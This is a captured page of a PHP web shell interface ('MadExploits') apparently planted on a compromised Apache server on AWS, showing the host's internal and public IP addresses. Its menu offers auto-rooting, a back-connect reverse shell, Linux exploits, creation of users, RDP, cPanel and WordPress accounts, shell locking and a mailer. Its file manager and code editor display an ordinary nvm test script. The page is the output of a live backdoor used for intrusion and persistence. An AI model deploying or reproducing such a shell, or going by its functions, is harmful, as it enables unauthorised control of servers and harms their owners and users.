Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.221.103
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
test /
install_script /
[ HOME SHELL ]
Name
Size
Permission
Action
nvm_check_global_modules
1.46
KB
-rwxrwxr-x
nvm_detect_profile
3.84
KB
-rwxrwxr-x
nvm_do_install
187
B
-rwxrwxr-x
nvm_install_dir
677
B
-rwxrwxr-x
nvm_install_with_aliased_dot
325
B
-rwxrwxr-x
nvm_install_with_node_version
163
B
-rwxrwxr-x
nvm_profile_is_bash_or_zsh
724
B
-rwxrwxr-x
nvm_reset
1.34
KB
-rwxrwxr-x
nvm_source
1.84
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nvm_install_dir
#!/bin/sh cleanup () { unset -f die cleanup unset install_dir } die () { echo "$@" ; cleanup ; exit 1; } NVM_ENV=testing \. ../../install.sh HOME="__home__" # NVM_DIR is set NVM_DIR="some_dir" install_dir=$(nvm_install_dir) [ "_$install_dir" = "_$NVM_DIR" ] || die "nvm_install_dir should use \$NVM_DIR if it exists. Current output: $install_dir" unset NVM_DIR # NVM_DIR is not set install_dir=$(nvm_install_dir) fallback_dir="" [ ! -z "$XDG_CONFIG_HOME" ] && fallback_dir="$XDG_CONFIG_HOME/nvm" || fallback_dir="$HOME/.nvm" [ "_$install_dir" = "_$fallback_dir" ] || die "nvm_install_dir should default to \$XDG_CONFIG_DIR/.nvm. Current output: $install_dir" cleanup
Close